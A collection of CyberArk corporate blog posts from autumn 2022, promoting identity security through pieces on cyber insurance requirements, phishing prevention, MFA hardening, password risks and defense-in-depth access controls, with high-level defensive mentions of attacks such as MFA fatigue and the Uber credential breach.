Insurers aren’t just considering ransomware risk as they tighten up qualifications. Current market volatility and continued geopolitical tensions also factor into the equation. SolarWinds, Kaseya, Log4j and other high-profile incidents have intensified concerns around software supply chain risks, prompting new questions around aggregation exposure and systemic losses. Meanwhile, global privacy regulations continue to evolve in patchwork fashion, and litigation and fines are growing — fueling even more underwriting questions.

With fees at a premium, HelpNetSecurity reports the number of organizations that won’t be able to afford cyber insurance, or that will be declined or offered limited coverage, is set to double in 2023.

2023 Requirements Will Dig Deep. A Solid Controls Narrative Provides an Edge

Scoring a policy or renewal with the right terms may be difficult, but it’s not impossible. Dietzman confirmed carriers and underwriters are responding favorably to companies instituting robust security controls and incident response plans — especially those prepared to dive deep into their cybersecurity architectures and planned roadmaps. “It’s important to articulate a meaningful risk-based approach to cybersecurity. If you do, you’re sitting on high water,” Dietzman explained.

Underwriters often assess security systems and practices by using open-source scanning tools like OpenVAS and OpenSCAP to probe an applicant’s networks for vulnerabilities and security rating services like SecurityScorecard and BitSight to evaluate risk. Many underwriters partner with outside cybersecurity firms to vet customers.

During these evaluations, they’re looking for evidence of specific cybersecurity controls and practices, and upcoming 2023 audits will examine certain areas more closely than ever before.

Since ransomware attacks typically start on workstations and servers, endpoint security will be under the microscope. Initially, insurers wanted to see that a company trained its employees in phishing and credential theft techniques and used endpoint detection and response (EDR/XDR) solutions to help identify and remediate suspicious activity.

But while training and EDR/XDR solutions are both critical (and still required by most insurers), attackers are constantly switching things up. This makes it very difficult for employees to reliably recognize new attack techniques and also means sophisticated attackers have found ways to turn off or bypass EDR/XDR by abusing administrative credentials, as seen in the SolarWinds attack. This has prompted more underwriting scrutiny around endpoint privilege controls, especially a company’s ability to remove local admin rights from all users — senior system administrators, developers and even people using legacy applications that require admin rights. The big challenge for organizations here will be finding the right balance between least privilege control and operational efficiency.

Requirements for multifactor authentication (MFA) — a checkmark item for insurers until recently — are also growing. Insurers started to dig deeper as more post-payout analyses revealed MFA wasn’t being fully utilized, particularly in the healthcare and higher education sectors. They found major coverage gaps for privileged accounts, which are not often linked to a specific person (i.e., the admin account that exists on every server) but are used by system administrators and other privileged users and protect sensitive data. As a result, underwriters have started mandating privileged access management (PAM) for privileged accounts not tied to specific users (i.e., local admin, root and service accounts) to achieve MFA, along with isolation of high-value assets.

Insurers are also looking at how organizations authenticate third-party privileged users from vendor organizations who need access to sensitive data and company systems. Vendors require the same security, yet they are rarely given the same security consideration as employees. For instance, if a vendor is onboarded for a brief two-week engagement, they should be onboarded and offboarded following the same HR processes as a new employee to minimize risk.

This heightened focus on privileged access management is starting to extend beyond human identities to non-human identities, which typically outnumber human identities by 45:1. These “machine identities” could be service accounts, hardcoded secrets or any off-the-shelf or homegrown solution requiring powerful credentials to perform its function (i.e., configuration management databases platforms and DevOps orchestration tools), along with automated processes such as robotic process automation (RPA). As part of this, insurers are looking for stronger privileged controls around automated patch management systems, vulnerability scanners and other existing security tools that attackers may try to disable.

Beyond technology safeguards, insurance carriers still want to see sound people practices, such as conducting ongoing cybersecurity awareness training. They’ll also evaluate data backup practices and incident response plans to understand how quickly the organization could restore operations in the wake of an attack.

Steps in the Right Direction

As companies prepare for cyber insurance renewals, they should be cognizant that security control requirements are evolving to address the fast-paced world of digital business.

Yet accelerated change is always difficult from an organizational and cultural standpoint and can stir up fear and uncertainty. The best way to minimize this is to make sure people understand the “why,” and that risk mitigation controls will not impact operational efficiency. It’s important for companies to spend time on the education factor.

The good news is that more companies are stepping up to the plate and taking meaningful steps to bolster their ransomware defenses. As stronger controls are implemented and used more effectively, insurer losses are starting to stabilize and soften the market a bit. We’re not out of the woods yet, but we’re starting to move in the right direction.

As organizations work to meet today’s requirements with an eye on the future, their focus must remain on effectively mitigating cyber risk without slowing business down.

Organizations looking to close security gaps within a specified period to either land or maintain a cyber insurance policy can benefit by aligning with the right security partner. CyberArk can play that role, helping you strengthen security, meet pre-audit requirements, keep premiums down and maintain business velocity. To learn more, check out our cyber insurance resources.

]]>
Eight Phishing Prevention Steps for Business https://www.cyberark.com/blog/eight-phishing-prevention-steps-for-business/ Tue, 18 Oct 2022 13:00:23 +0000 https://www.cyberark.com/?p=135575

Cybersecurity Awareness Month 2022 prioritizes education for improving phishing recognition and reporting. Security leaders agree, ranking employee training as the second-most effective defense-in-depth layer for ransomware protection. Overall security awareness is up, but cyberattackers keep phishing. The question is, why do people keep biting?

Inherent Trust Gives Phishing Attackers a Leg Up

Psychological studies on everything from brain chemistry to infant behavior to Ponzi schemes suggest we can’t help ourselves: Humans are hardwired to trust.

Since the beginning of time, criminals have studied human behavior to exploit trust (remember the Trojan Horse in history class?). Only their methods have changed, and they keep getting better with technology’s help. Today, as users work from anywhere, toggling frequently between corporate and personal devices, these factors work in attackers’ favor:

  • Easier social engineering. Employees are conducting more of their personal lives online, making it easy for attackers to conduct reconnaissance and connect with them on social networks. When someone has access to a valuable corporate asset, an attacker may spend months building a relationship with them before sending a phishing email containing malicious code.
  • More identities to exploit. The expanded use of SaaS tools is generating new identities that end up inadequately secured and monitored. With some tools, every time a new team is set up, an email account is created for the team to use. An attacker can compromise this account or generate a fake account to send messages to the team.
  • New ways to deceive. With so many new digital tools in the mix, workers may be less likely to question out-of-the-ordinary requests or changes in workflow.

Part of our job as defenders is arming workforce users with the knowledge and skills to thwart phishing attempts. Another is thinking like an attacker, recognizing that someone will slip up, think a phony call is legit, get fatigued by too many MFA prompts or be tricked by some novel phishing tactic.

Eight Ways to Fight Phishing and Move Closer to Zero Trust

People will always have trust issues. This may be why 88% of security leaders agree that Zero Trust is the way. This approach centers on assessing every request to access a corporate resource — data, applications and infrastructure — before granting access and then tightly limiting access for verified users and devices.

Part of viewing cybersecurity through a Zero Trust lens involves taking proactive steps to make your access systems more phishing-resistant, help end users recognize phishing attempts and reduce potential damage by deploying mechanisms to minimize impact if users are lured into taking the bait.

8 anti-phishing steps

  1. Set up phishing-resistant multifactor authentication (MFA) mechanisms such as FIDO, QR codes or physical tokens.
  2. Implement foundational Zero Trust policies like requiring users to register phishing-resistant authenticators, using step-up authentication prompts when sensitive apps are launched or sensitive information is changed, mandating MFA for personal profile modifications and setting up automatic alerts that flag risky user behavior.
  3. Segment your network. This way, when phishing is successful, the attacker’s movement inside the network will be restricted and access to sensitive resources will be blocked.
  4. Secure your devices. Endpoint security hygiene is imperative, as devices are more exposed to phishing and malware in perimeter-less environments. One major operational challenge to overcome will be maintaining a full, up-to-date inventory of users and devices.
  5. Revisit your BYOD policies. The difficulties of verifying devices can be compounded by unmanaged devices. Shipping hardened corporate laptops to remote workers is not always feasible. And workers may still connect to Internet-facing corporate applications from a personal device. Consider implementing minimum standards for strengthening hybrid workers’ home networks, such as changing default router credentials and using strong WiFi passwords.
  6. Conduct periodic phishing exercises. Returning to psychology, a well-known cognitive bias known as the Dunning-Kruger Effect highlights people’s tendency to overestimate their own capabilities. Live-test scenarios and Red Team exercises can help challenge thinking, uncover blind spots and strengthen security defenses.
  7. Foster greater collaboration across various business functions and IT security teams to improve identity governance and lifecycle management practices such as deprovisioning accounts when users exit their roles, conducting “know your employees” assessments, training third-party users and continuously monitoring access.
  8. Lean on expert guidance across people, process and technology. This is where the domain knowledge and experience of your cybersecurity provider matters. With access to educational resources and an expert team that understands your business goals, your security organization can improve outcomes in areas such as access reviews and collections monitoring, virus scan performance testing, penetration testing, resolving stalled workflows and processes, and delivering the right reports for the right stakeholders.

Assuming people will trust too much is woven into Zero Trust’s “trust nothing, verify everything” philosophy. Identity Security offers a set of technologies that can help your organization enable Zero Trust more efficiently. As your team prioritizes phishing prevention this Cybersecurity Awareness Month, the Identity Defined Security Alliance provides a useful framework to help you #BeIdentitySmart and understand the technology components — from devices to network, applications and storage — that require protection at the identity level.

]]>
In “Digital or Die” Financial Sector, Identity Security Accelerates Transformation https://www.cyberark.com/blog/financial-services/ Fri, 14 Oct 2022 13:00:33 +0000 https://www.cyberark.com/?p=135487

“Digital or Die” has become the motto for the financial services sector. Consumer expectations are pushing further and further into digital realms — and they’ve never been higher. Take Gen Z users, for instance, who shop primarily online and expect their digital payment options to offer multiple touch points, have clean interfaces and personalize their experiences.

To meet these heightened demands, banks and financial services organizations around the world are transforming the way they do business. They’re digitizing legacy platforms, accelerating cloud migrations and investing in emerging technologies such as artificial intelligence (AI) and internet of things (IoT) to increase agility.

This unprecedented change also means unprecedented opportunity for cyberattackers who look to turn these very innovations against the organizations embracing them. Ransomware actors, specifically, have become incredibly creative. They’re finding and exploiting weaknesses using autonomous decision-making and self-learning capabilities, deploying sophisticated tooling and hands-on-keyboard actions to disable endpoint defenses and targeting data-rich providers upstream, among many evolving methods.

Identity Security as a Financial Business Accelerator

In this ever-expanding threat landscape, “Identity is the strongest security control that every organization must get right,” noted Damon McDougald, global identity and access management (IAM) lead, Accenture, at our CyberArk Impact 2022 event in Boston.

Yet 79% of senior security leaders across industries admit that cybersecurity has taken a back seat to digital transformation initiatives, driving up cybersecurity debt and potentially hamstringing future innovation and growth.

“Security should be a business accelerator — not something that stops the train,” asserted McDougald. “But when it comes to digital transformation, I see a lot of organizations stalled because they can’t authenticate in the cloud, or manage user access or entitlements or policy in the cloud.”

He continued, “The organizations ‘doing digital transformation right’ are those that can figure out how to use identity to enable, and even automate, the transformation up front.”

Enable Business Transformation

Accenture and CyberArk: An Innovative Alliance for Financial Services

As financial ecosystems and value chains expand, Accenture and CyberArk have developed an innovative alliance to strengthen financial organizations’ cyber resilience and drive transformation initiatives forward. Here are two recent stories of their joint work with leading financial services organizations around the world:

Addressing audit findings to achieve compliance. After a failed audit and facing regulatory pressures, a U.K.-based financial institution turned to Accenture to implement CyberArk Identity Security solutions to protect privileged access to critical systems (Tiers 1 and 2) and underlying infrastructure. The Accenture team was integral in facilitating an enterprise-wide identity audit, setting up an operating model for onboarding infrastructure and applications into CyberArk, defining required controls and mobilizing stakeholders to drive security change management. The privilege-focused Identity Security program was successful in delivering measurable cyber risk reduction, helping the organization meet compliance requirements, and contributing to millions in audit and change management-related cost savings over time.

Streamlining secure access and building trust. Without a proper way to manage privileged access across an IT environment, cyber risk grows and compliance suffers. A large credit union asked Accenture to help select a comprehensive solution that could store, manage and audit all privileged accounts and users. Accenture helped the credit union select CyberArk, plan for an implementation, design an onboarding strategy for all privileged accounts and develop a roadmap for product maturity. By embracing an Identity Security strategy and onboarding privileged accounts, the credit union was able to meet regulatory requirements, secure administrator access and create a “single-pane of glass” for monitoring and auditing of all privileged accounts.

Identity Security You Can Bank On

“I believe identity and access management professionals have the hardest job in IT today,” said McDougald in his closing Impact remarks. “We have to know how our business operates, we have to integrate tools with the entire organization, we have to enable our organization — and the pressure continues to mount. Fortunately, there are ways to create a frictionless experience that’s highly secure. As IAM professionals, it’s our job to sell that value to our organizations and deliver the tools and approaches that enable business to go at warp speed.”

Identity and security teams don’t have to go it alone. Accenture and CyberArk work together to help financial services organizations secure access for all identities across the enterprise and within customer applications so they can meet consumer expectations and defend against attacks.

]]>
Why Strong Passwords Alone Won’t Stop Identity-Based Attacks https://www.cyberark.com/blog/why-strong-passwords-alone-wont-stop-identity-based-attacks/ Wed, 12 Oct 2022 13:00:17 +0000 https://www.cyberark.com/?p=135439 Passwords Need Defense-in-Depth Identity Security

You can buy almost anything online without leaving the couch now. Need groceries? Check. A holiday? Check. Even a new car? It will magically appear in your driveway — no haggling required! Unfortunately, purchasing stolen credentials has become just as simple. In a market where remote desktop protocol (RDP) access can be bought for under $10, both novice fraudsters and sophisticated attackers are snatching up passwords and usernames in bulk.

With lengthy lists of passwords at their disposal, cybercriminals rarely need to flex their creative muscles. Plain old credential stuffing will open a door to an enterprise environment. If it doesn’t, an automated brute-force attack to guess and test username/password variations at scale is a solid backup plan. Of course, some attackers go the extra mile to trick cautious workforce users into giving up their strong passwords with novel phishing and social engineering techniques like those seen lately.

No matter how strong your organization’s password policies and awareness efforts are, they won’t be enough to defend your organization against identity-based attacks on their own.

Here’s why strong passwords are not enough:

Workers know strong passwords are important. They just can’t keep up. 

  • The average staff member accesses more than 30 applications and accounts at work (and roughly 55 others at home). Requiring users to repeatedly authenticate themselves to systems and applications — and to maintain multiple complex passwords — has become too much. So, people continue to change a single digit on their old password when required, save passwords in their browsers or store them in company-provided password managers (built for consumer purposes) and call it a day.
  • Fifty-two percent of an organization’s workforce has direct access to sensitive corporate data. A designation once reserved for IT admins, “privileged users” could mean anyone now — an HR professional, finance manager, developer, third-party vendor — you name it.

Humans aren’t the only ones using passwords and credentials at work.

  • Non-human identities outnumber human identities by a factor of 45x. Yes, you read that correctly.
  • Of these machine identities, 68% have access to sensitive corporate data and assets.
  • As organizations accelerate to hybrid or multi-cloud environments, there are even more gaps (read: human and machine identities) that attackers can use as entry points.

Embedding credentials, overprovisioning cloud permissions and other risky password practices are on the rise.

  • Whether they’re crunched for time, lacking cloud-specific technical skills or feeling pressure from developers and cloud engineering teams, IT teams often overprovision cloud identity and access management (IAM) permissions — giving identities more privileges than they need — in the name of productivity. As excessive cloud permissions pile up with every new IT or transformation initiative, risk exposure grows and cybersecurity debt accumulates.
  • The constant push to operate and deploy faster has also led to more embedded (or hardcoded) credentials and access keys in code. These credentials are rarely (if ever) changed and often left exposed. When powerful credentials for enterprise security systems are embedded into scripts, the result can be disastrous, as seen in the recent Uber breach. By compromising the credentials of a non-privileged user, the attacker was able to locate embedded admin credentials for Uber’s privileged access management (PAM) solution in a misconfigured network share — and in doing so, became a “privileged user” with access to the many powerful credentials stored inside. This emphasized the need for strong defense-in-depth layers surrounding credential vaults and other critical security systems.

IT security teams like yours are drowning everywhere.

  • An enterprise of 1,000 employees spends an estimated $495,000 annually on resolving password issues alone.
  • Password resets are just the tip of the iceberg. IT security departments are struggling to defend against ransomware, software supply chain attacks and more as a lack of skilled workers continues to plague the industry. According to ISSA research, ramifications include increasing workloads for existing team members (62%), unfilled open jobs (38%) and high burnout rates (38%). The U.S. Bureau of Labor Statistics estimates demand for cybersecurity employees will surge 33% from 2020 to 2030. Many of these openings will be from workers transferring out of the profession or exiting the labor force.

Getting rid of passwords completely may seem like the solution to all of this, but the world is not there yet (though decentralized identity on the blockchain and other technology advancements show promise). And traditional password managers and disparate IAM solutions weren’t built to protect and continuously manage the thousands (or tens of thousands) of identities within your enterprise — nor were they intended to reach across the data center, hybrid, multi-cloud and SaaS environments.

As identity-based threats continue to grow and passwords continue to fail, a broader approach is in order. It’s not so much about stopping attackers from getting in anymore; it’s about making it very difficult for them to move around the network without raising red flags and creating so much noise that they become easier to spot and block.

A defense-in-depth Identity Security framework can help take your strong password policies to the next level and move you closer to zero trust. Centered on privileged access management, Identity Security provides the intelligent controls needed to secure any human or machine identity wherever it exists — not just those considered “privileged.” Each individual identity is granted the exact level of access it needs to interact with applications, infrastructures and data — at just the right time — while encircled by continuous threat detection.

Behind the scenes, controls such as session isolation and monitoring, elevation and delegation are infused into access and identity management capabilities to increase accountability and compliance. This means access can be monitored on an ongoing basis across data center, hybrid, multi-cloud and SaaS environments, and risk-based controls can be applied for each identity to keep things simple for end users.

In the spirit of Cybersecurity Awareness Month, consider how elevating your strategy with Identity Security can empower your team do more, block more attacks and enable more innovation. If you’re ready to take the first step of assessing your environment to discover overprivileged identities, risky permissions and other unknown threats, we’re here to help.

]]>
You’ve Enabled MFA — Great! This Cybersecurity Awareness Month, Focus on How and Where It’s Used https://www.cyberark.com/blog/youve-enabled-mfa-great-this-cybersecurity-awareness-month-focus-on-how-and-where-its-used/ Tue, 04 Oct 2022 13:00:22 +0000 https://www.cyberark.com/?p=134902 MFA

Decades ago, the internet was built to give people a way to access and share information fast. What it wasn’t built for was safety, which is how we ended up with an entire month dedicated to cybersecurity. And after the year we’ve just had, it’s fitting that Cybersecurity Awareness Month 2022 is focused so heavily on Identity Security behaviors. But if you’re looking for another post on why your organization should be using multifactor authentication (MFA), this isn’t it.

As a fellow cybersecurity professional, I imagine you already know MFA can help block up to 99.9% of account compromise attacks, reduce reliance on risky passwords and simplify user authentication experiences with the help of behavior-based analytics. You understand many security teams (possibly even your own) have taken their first step toward Zero Trust by implementing MFA. You’re also very aware that attackers have gotten better at tricking users into giving up their second authentication factors, and in some instances, they’ve found ways to bypass MFA mechanisms completely.

Your MFA controls need a checkup this Cybersecurity Awareness Month. Start with these seven questions.

Thanks to repeated front-page news coverage, MFA fatigue attacks are likely high on your radar. For these, threat actors employ various digital and voice-based phishing techniques to steal credentials and  then send repeated MFA push requests to a target’s mobile device to successfully dupe employees and third-party vendors.

Yes, employee training is an important preventative step. But taking a hard look at how — and where — you’re deploying MFA is even more important. As you do, review these seven questions help make sure your organization is making the most of its MFA deployment.

Is your MFA system currently…

1. Using standards-based single sign-on (SSO)? Since credentials are inherently vulnerable to compromise, look for every opportunity to use fewer of them. Combining MFA with SSO eliminates user friction by reducing logons and swapping passwords for more intuitive methods like device certificates or biometrics. When possible, use or build SSO tools supporting standard protocols such as SAML or OpenID Connect.

2. Locking down MFA registrations? When MFA is provisioned to a user, you need ways to verify that each user is who they claim to be. Otherwise, attackers can steal passwords and try to register their own devices as authentication factors. To reduce risk, consider using an out-of-band process such as a phone call to check if a registration request was legitimate, only allowing registration for one device per user and requiring a valid physical ID, such as a passport, as part of the user registration process.

3. Limiting MFA prompts? When users get bombarded with requests, they may respond without thinking or out of exasperation. Setting thresholds for the number of MFA prompts a user can get within a certain period can help fight user fatigue and make things harder for attackers.

4. Strengthened with privileged access management (PAM) controls to protect all channels? This is critical for protecting sensitive resources. With this approach, credentials for accessing a sensitive server, for example, are stored in a centralized vault. MFA is required to log into the vault and check out the credential for the server. Intelligent privileged controls make it possible to isolate sessions, so the credential is not exposed on the endpoint, and monitor all credential usage, regardless of channel.

5. Using analytics to balance security and productivity? You’re part of a rock-star team, but at some point, you all need to sleep. Leaning on AI and machine learning makes it possible to assess each access request based on historical user behavior, device and network patterns in real time. If this context is not “normal,” the system can adapt controls such as requesting reauthentication or adjusting the level of access and automatically detect risky activity earlier in the attack lifecycle. Analytics can help to minimize end-user friction by putting up gates only when absolutely necessary, based on a risk score. What’s more, 90% of organizations employing contextually aware automation can quantify reduced IT effort and costs.

6. Configured to record and monitor user activity in web applications? If not, digging through logs after an incident won’t do you much good. Eighty percent of organizations report employee misuse or abuse of access to business applications, yet nearly half (48%) have limited ability to view user logs and audit user activity. This makes it difficult to understand and control how employees and third-party partners are using web apps and handling confidential data. Take steps to configure your system to record user actions within protected apps, create complete and searchable audit trails and re-prompt users for reauthentication during high-risk sessions (via a QR code scan, for instance). Also consider endpoint controls that prevent users from copying data or downloading files.

7. Supported by layered defense-in-depth controls? Even the most masterfully configured MFA systems aren’t fail-proof. That’s why layering Identity Security controls and practices — such as consistently enforcing least privilege and removing standing access to sensitive infrastructure and cloud consoles — is so critical. If one system falls down, another stands ready to block attacks and keep sensitive assets out of harm’s way.

I hope these questions prompt even more questions about how a unified Identity Security strategy — centered on intelligent privilege controls — can help you and your team #BeIdentitySmart and better defend against attacks, satisfy audit and compliance, enable the digital business and drive operational efficiencies.

If you’re looking to better understand the identity attack chain, brush up on best practices this Cybersecurity Awareness Month or pinpoint identity-based weaknesses in your environment, the CyberArk Blueprint for Identity Security Success is a great place to start.

]]>
This Cybersecurity Awareness Month, Set Your Identity Security Strategy to Master Cyber Fundamentals   https://www.cyberark.com/blog/this-cybersecurity-awareness-month-set-your-identity-security-strategy-to-master-cyber-fundamentals/ Mon, 03 Oct 2022 13:00:57 +0000 https://www.cyberark.com/?p=134785 This Cybersecurity Awareness Month, Set Your Identity Security Strategy to Master Cyber Fundamentals

As Cybersecurity Awareness Month (CSAM) begins this October, government and private organizations in the United States, the European Union and around the world are promoting safe and secure digital behaviors. The 2022 theme of “See Yourself in Cyber” doesn’t just encourage consumers to #BeCyberSmart in protecting their personal identities and information — it also underscores the role each cybersecurity professional plays in defending their organization and strengthening the broader supply chain ecosystem against pervasive identity-based attacks and data breaches.

Security Practitioners, “See Yourself in Cyber” this CSAM by Reassessing Your Greatest Source of Risk

Though you live in this world year-round as a cybersecurity professional, you can still benefit from taking some time to assess your organization’s security posture and revisit the basics this month. Because the identity landscape is large, complex and continuously evolving, and while cyber hygiene practices are widely understood and accepted, this is where things still tend to fall apart.

When they do, human error is often in play: An employee of a third-party vendor falls for a sophisticated phishing attack, and workforce identities get compromised, or a short-staffed cloud team overprovisions cloud IAM permissions, giving machine identities more privileges than they need. Sometimes technology fails: Maybe a security solution wasn’t built for a hybrid environment, or maybe it “drifted” over time as the digital environment evolved. Or perhaps security fundamentals were skipped over for (what seemed at the time to be) more pressing transformation priorities. Despite many varying factors, it ultimately comes back to identity, as seen consistently in major breach headlines since this time last year, and the year before that, and the year before that…

See the Bigger Picture and Make a Bigger Impact with Identity Security

Protecting your organization from identity-based threats isn’t about turning on a new solution or holding a phishing awareness webinar to check a box and move on. It’s about thinking bigger and embracing a continuous, defense-in-depth strategy that targets each “layer” of risk with both proactive and reactive security controls, prescriptive guidance for security (practitioners and line of business), and cyber hygiene awareness and best practice adherence from individual users.

This is when Identity Security can help. Centered on intelligent privilege controls, Identity Security is a strategy encompassing people, processes and technology aimed at securing an organization’s most valuable digital assets. Identity Security takes a unified approach by enabling secure just-in-time and standing access for all identities — human and machine — as they access many resources across various complex environments, flexibility automating the identity lifecycle, and continuously detecting and protecting against identity-based threats.

The Four Pillars of Identity Security (Source: Identity Security: Why It Matters and Why Now)

Throughout the month of October, we’re publishing a series of posts highlighting learnings from recent breaches and offering practical guidance aligned with four key identity-centric behaviors identified by CSAM organizers:

  • Enable multifactor authentication (MFA). Enabling seamless, secure access for all identities with adaptive MFA is an important piece of an Identity Security strategy, but it’s not the only one. And, as evidenced by recent MFA fatigue attacks and increasingly stringent cybersecurity insurance requirements, it’s not enough to have MFA technology in place — making sure it’s deployed and managed correctly and consistently is just as critical.
  • Use strong passwords. It’s easy for threat actors to compromise identities through credential theft using tried-and-true methods such as credential stuffing and brute-force attacks. The mathematics of password cracking clearly shows no matter how many times you change your passwords (or mandate password resets across your organization), it won’t be enough. Why? For one thing, it won’t cover the numerous hard-coded credentials in your environment. Through a least privilege-lens, Identity Security blankets all types of passwords, credentials and secrets to significantly reduce the access of any compromised identity and limit the blast radius of an attack.
  • Update software. Patching devices and systems to address security issues and fix bugs has long been a cyber hygiene fundamental. When the Log4j vulnerability entered the scene, this became even more critical.  But what happens when an attacker successfully weaponizes a routine update — the very means by which organizations protect themselves — to gain a foothold, compromise identities and abuse privileged credentials to access valuable assets, à la SolarWinds? Updating software today requires a careful balance between automation and manual effort, while always assuming breach and working to contain risk with multiple Identity Security layers.
  • Recognize and report phishing. By carefully studying human behavior and underlying motivations and weaknesses, cyberattackers are, in many ways, the ultimate psychologists. Instead of using this knowledge for good, they exploit people’s natural tendency to trust, and no matter how strong an organization’s technological defenses may be, sophisticated phishing and social engineering attacks often succeed. This may be why 88% of security leaders agree that moving toward a “never trust, always verify” Zero Trust model is so important and why security teams increasingly view Identity Security as the most direct and efficient way to get there.

This Cybersecurity Awareness Month, our aim is to give IT and security professionals like you the Identity Security tips and tools needed to defend against today’s greatest source of risk, support Zero Trust adoption and maximize impact through a holistic approach. Check back soon for more CSAM content, and join us on Twitter, LinkedIn and Facebook to keep the conversation going.

]]>
Trust Issues Podcast Playback: Udi Mokady on Identity Security’s Impact https://www.cyberark.com/blog/trust-issues-podcast-playback-udi-mokady-on-identity-securitys-impact/ Fri, 30 Sep 2022 15:50:33 +0000 https://www.cyberark.com/?p=134774 Trust Issues Podcast Playback: Udi Mokady on Identity Security’s Impact

The productivity secrets of highly effective leaders fascinate me – how they’re able to juggle numerous responsibilities, while still finding time to sharpen their skills. Everyone gets the same 24-hour day, but some people can seemingly stretch them out to do more.

As host of the Trust Issues podcast, I recently sat down with CyberArk’s Founder, Chairman and CEO, Udi Mokady, for a discussion grounded in Identity Security, with some scenic detours along the way. During both our on- and off-air chats, I wasn’t surprised to learn he’s got some productivity hacks of his own, one of which involves … podcasts. Mokady is a self-proclaimed podcast aficionado who catches up on his favorite titles during late-evening walks with his dog. It’s a healthy way to unwind, while actively listening and learning on the go.

This notion of impact – in finding new ways to tackle tasks or challenges for stronger effect – was a major theme in our broader, recorded conversation about Identity Security. For instance:

  • Years ago, the desire to help organizations solve a pervasive problem and make a meaningful impact led Mokady and his high school friend to come up with an entirely new way of securing companies’ most critical assets – what would later be known as Privileged Access Management.
  • Strong, impactful customer relationships built on trust and CyberArk’s commitment to staying around for the long term is what continues to shape CyberArk’s trajectory and Identity Security vision today.
  • Cyberattackers are constantly innovating and making their own indelible impact on the world. As ransomware, software supply chain attacks and new threats continue to evolve, security leaders are heroically defending their organizations with a strong sense of mission and an assume breach mindset. And they’re amplifying their impact by coming together to share best practices and collectively tackle challenges.
  • In a typical enterprise, machine identities now outnumber human identities by 45:1, and any one of these identities can be compromised by an attacker. There’s growing urgency to address this expanding identity problem with more impactful security that unifies and simplifies approaches so security teams can get more done and (finally) also have time for a good night’s sleep.

Check out my full conversation with Udi Mokady on the Trust Issues podcast. You can find it on Spotify, Apple Podcasts, Amazon Music and Google Podcasts – or (borrowing Sam Elliott’s golden pipes) … wherever you get your podcasts.

]]>
5 Defense-in-Depth Layers for Enabling Secure Access   https://www.cyberark.com/blog/5-defense-in-depth-layers-for-enabling-secure-access/ Tue, 27 Sep 2022 15:07:26 +0000 https://www.cyberark.com/?p=134606 Defense-in-Depth Data Breach Protection

Cybersecurity is one of many industries that love jargon. As in the medical and legal professions, complex topics often get crunched into digestible phrases, with the “stickiest” of terms eventually finding their way into our daily cyber speak. But along the way, meanings can get fuzzy.

Defense-in-depth” can be one of those phrases. The overarching concept is well understood: Instead of relying heavily on one security tool or control, create multiple security layers. This way, controls intended for specific risks can complement one another’s strengths – and if one fails, another stands behind it. In other words, there’s strength in numbers. But what, exactly, does defense-in-depth look like in terms of enabling secure access – how companies verify each user’s identity and give that user secure access to its sensitive resources?

Identity and Access Risk by the Numbers

Let’s start with some numbers. Many cyberattackers have shifted attention from highly privileged IT admins to new workforce populations with direct access to valuable data and systems – business executives, software developers, HR professionals, finance managers, external consultants and others. According to the CyberArk 2022 Identity Security Threat Landscape Report:

  • More than half of organizations’ workforces (52%) have direct access to sensitive corporate data as they work from a variety of locations and on many different devices.
  • The average staff member accesses more than 30 applications and accounts. Any one of these identities can become privileged under certain conditions.

With this workforce identity deluge as a backdrop, we’re breaking down five common areas of access risk, and practical identity-centric defensive layers to help mitigate them.

Read our whitepaper on how you can build a defense-in-depth approach that can secure your organization against identity-focused breaches and attacks.

How to Harden Five Risky Workforce Access Areas

1. Weak or disruptive authentication mechanisms. Since 80% of breaches begin with compromised passwords or credentials, it’s clear that single-factor authentication won’t cut it. Multifactor authentication (MFA) has become a baseline for verifying a user’s identity – traditional approaches require two or more authentication sets at login. But in their own pursuit of innovation, attackers are finding more ways to work around legacy MFA policies, such as tampering with QR codes, hijacking cookies and exploiting user authentication fatigue by “MFA bombing.”

Defensive security layer: Strengthening this security layer isn’t just about adding more controls, it’s about making them smarter and more autonomous. Consider how behavioral analytics and automation could be used to help security teams – and the MFA capabilities they use – better understand individual users’ access habits and build context on what constitutes risk over time. This way, users don’t have to jump through extra authentication hoops unless they’re necessary. And if your smart controls spot a potential threat, they can take action, from presenting extra MFA factors to shutting attackers out.

2. Unprotected endpoints. Less than half (43%) of IT security decision-makers say they apply Identity Security controls to company-supplied user machines. This leaves a wide variety of machines – including physical and virtual desktops and servers – vulnerable to ransomware, phishing and other attacks originating on the endpoint. For example, a user’s workstation could serve as a gateway for attackers to find poorly guarded credentials, exploit the identities of overly privileged users, infiltrate networks, and move through an environment to disable threat detection systems and cause damage.

Defensive security layer: Blending an adaptive form of MFA with endpoint privilege controls can help organizations address risks stemming from a hybrid work infrastructure in which any user’s workstation can be a target.

3. High-risk business applications. Today, 63% of organizations give their typical end user access to between five and 10 (or more) high-value applications, which contain sensitive resources such as financial data, customer information and intellectual property. However, with access comes risk: 80% have experienced end users misusing or abusing access to these applications in the past year. Most identity providers apply an authentication challenge at login to a web session, but what if the user steps away from their screen, leaving the session exposed? 

Defensive security layer: Security controls here are most effective if they continue working to monitor, record and audit user actions after authentication. This enhanced visibility can benefit security teams on many fronts. For instance, 41% say it would enable them to identify the source of a security incident, such as data exfiltration, faster.

4. Third-party vendors. Outside vendors are integral extensions of enterprise teams, and many hold super-user access to internal systems. But with more than 90% of organizations experiencing a security incident linked to an external partner, it’s clear that third parties represent an ever-growing attack vector that requires as much attention as internal privileged users.

Defensive security layer: This layer requires a thoughtful balance between security and productivity, which can be tricky to strike since vendors typically use their own hardware in the process of accessing their enterprise clients’ systems. Finding a way to systematize third-party privileged access vetting and monitoring will go a long way – and the less you can rely on VPNs, passwords or agents to do this, the better.

5. Credentials “living” outside of single sign-on. Properly securing credentials is key to minimizing identity compromise. But that’s really difficult to do when workforce users are required to log in and out of numerous services and apps each day that use different passwords than corporate or single sign-on (SSO) credentials. Making matters worse, these passwords are often stored in unsecure locations or shared with colleagues in unsecure ways out of convenience.

Defensive security layer: In this layer, the password-based credentials of all users – not just the IT admins of the world – are protected by the strong privilege controls of enterprise-level, vault-based storage. Because today, any workforce user can become highly privileged. Not only does this enhance overall visibility and control for IT security teams, it also makes things easier for users who can automatically capture and retrieve credentials when they need them.

So, what security vulnerabilities will you uncover once you begin looking at your organization’s attack surface in the context of layers? Whether you see a need to better secure the SSH keys of third-party privileged users or shared app account passwords of everyday employees, it’s time to start thinking more holistically about protecting identities of all types, in all use cases, across the entire lifecycle.

As you uncover gaps, a defense-in-depth strategy can help you introduce multiple Identity Security layers and human-centric practices such as security awareness training, gamified exercises and frequent phishing tests, can help reduce vulnerabilities and mitigate risk.

Defense-in-depth is a concept that goes hand in hand with a Zero Trust philosophy. But that’s another cybersecurity buzzword for another day.

